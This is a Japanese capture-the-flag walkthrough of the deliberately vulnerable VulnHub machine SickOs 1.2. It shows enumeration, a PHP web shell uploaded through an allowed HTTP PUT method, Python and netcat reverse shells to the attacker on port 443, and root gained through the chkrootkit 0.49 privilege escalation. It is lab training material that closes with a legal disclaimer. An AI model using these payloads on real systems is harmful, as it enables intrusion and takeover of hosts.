初心者がいっぱしのセキュリティエンジニアを目指す為に勉強した備忘録となりますので間違っているとことがあるかもしれません。
vulnhubの意図的に脆弱性が作り込まれたSickOs: 1.2のWalkthroughとなります。
vulnhubの情報
| Name | SickOs: 1.2 |
|---|---|
| Date release | 27 Apr 2016 |
| Author | D4rk |
| Series | SickOs |
PortScan:
SSHとlighttpdが動作しているようです。
| SERVICE | VERSION |
|---|---|
| ssh | OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0) |
| ssh | lighttpd 1.4.28 |
root@kali:~# nmap -sS -sV 192.168.56.76
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-10 12:41 JST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.76
Host is up (0.00067s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28
MAC Address: 08:00:27:22:6F:4B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.93 seconds
Enumeration:
ディレクトリを確認したところ、/testディレクトリが存在しました。
ですが、それ以外の有益な情報は何も得られませんでした。。。。
なので、ヒントをみたところ/testディレクトリのHTTPのmethodを確認しろということです。
root@kali:~# dirb http://192.168.56.76
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun May 10 12:44:12 2020
URL_BASE: http://192.168.56.76/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.76/ ----
+ http://192.168.56.76/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://192.168.56.76/test/
---- Entering directory: http://192.168.56.76/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sun May 10 12:44:17 2020
DOWNLOADED: 4612 - FOUND: 1
いろいろ使用できそうなメソッドがありますね。
PUTでリバースシェルをアップロードします。
root@kali:~# curl --head -X OPTIONS http://192.168.56.76/test
HTTP/1.1 301 Moved Permanently
DAV: 1,2
MS-Author-Via: DAV
Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
Location: http://192.168.56.76/test/
Content-Length: 0
Date: Sun, 10 May 2020 12:56:28 GMT
Server: lighttpd/1.4.28
Exploitation:
まず、kali linuxに同梱されている/usr/share/webshells/php/php-reverse-shell.phpを使用します。
こちらは自分の環境に合わせる為、IPを編集する必要があります。
--upload-fileで空ファイルはアップロードできるようですが、中身が存在するとアップロードできない??ようでした。
root@kali:~# curl http://192.168.56.76/test/ --upload-file php-reverse-shell.php
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>417 - Expectation Failed</title>
</head>
<body>
<h1>417 - Expectation Failed</h1>
</body>
</html>
なので、別の方法で行なっていきます。
osコマンドが実行できるよにファイルをアップロードしました。
root@kali:~# curl -X PUT http://192.168.56.76/test/fuga.php -d '<?php system($_GET["cmd"]);?>'
pythonが使用できるようなので、リバースシェルを実行します。
なかなか、接続されません・・・・・・・
ここで、いったん諦めてヒントみまくりました。
どうやら、iptablesでポートがかなり制限されているらしい。。。。。。
なので、ポート443で接続することができました。
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.65",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Privilege Escalation:
crontabを確認すると/etc/cron.dailyで定期的に事項されている、chkrootkitがありました。
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
$ ls -la /etc/cron.daily
total 72
drwxr-xr-x 2 root root 4096 Apr 12 2016 .
drwxr-xr-x 84 root root 4096 May 10 07:15 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
-rwxr-xr-x 1 root root 15399 Nov 15 2013 apt
-rwxr-xr-x 1 root root 314 Apr 18 2013 aptitude
-rwxr-xr-x 1 root root 502 Mar 31 2012 bsdmainutils
-rwxr-xr-x 1 root root 2032 Jun 4 2014 chkrootkit
-rwxr-xr-x 1 root root 256 Oct 14 2013 dpkg
-rwxr-xr-x 1 root root 338 Dec 20 2011 lighttpd
-rwxr-xr-x 1 root root 372 Oct 4 2011 logrotate
-rwxr-xr-x 1 root root 1365 Dec 28 2012 man-db
-rwxr-xr-x 1 root root 606 Aug 17 2011 mlocate
-rwxr-xr-x 1 root root 249 Sep 12 2012 passwd
-rwxr-xr-x 1 root root 2417 Jul 1 2011 popularity-contest
-rwxr-xr-x 1 root root 2947 Jun 19 2012 standard
chktootkit 0.49は脆弱性があるようです。
$ chkrootkit -V
chkrootkit version 0.49
root@kali:~# searchsploit chkrootkit 0.49
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Chkrootkit 0.49 - Local Privilege Escalation | exploits/linux/local/33899.txt
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
33899.txtに書いてあるとおりにやってみます。
$ echo '#!/bin/bash' > update
$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.65 443 >/tmp/f' >> update
$ chmod 777 update
netcatで443ポートで接続待ちをしていると、root権限で接続されました。
root@kali:~# netcat -nlvp 443
listening on [any] 443 ...
connect to [192.168.56.65] from (UNKNOWN) [192.168.56.76] 39311
/bin/sh: 0: can not access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
chkrootkit-0.49
newRule
# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.
Thanks for giving this try.
@vulnhub: Thanks for hosting this UP!.
免責事項
本記事は情報セキュリティにおける攻撃の理解、防衛のスキル向上を目的としたセキュリティに関する内容がございます。本記事の内容を使用し発生した如何なる損害や損失について、当記事作成者は一切の責任を負いません。
本記事の内容を実際に使用して、第三者の個人や組織などを攻撃した場合は
法律により罰せられる可能性がありので、必ず自身が所有している環境のみを
対象とし、他人や組織が所有している環境は決して対象としないようお願いします。